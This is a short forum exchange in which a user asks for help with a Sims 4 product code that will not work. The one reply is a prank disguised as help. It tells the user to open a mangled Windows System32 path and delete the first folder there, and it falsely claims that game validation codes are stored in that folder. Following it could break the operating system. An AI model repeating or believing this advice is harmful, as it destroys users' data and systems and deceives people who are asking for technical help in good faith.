Hey guys, I just bought The Sims 4 and my Product Code won't work. I feel silly. I'm just a girl so I have no idea what to do. Could anyone of you help me out and insert a new product code, please. Thank you ^‿^

Yeah, there is a little trick, navigate to C://username://Windows://System32/and erase the very first carpet that appears, codes for game validation get stored in here, so you can user this workaround
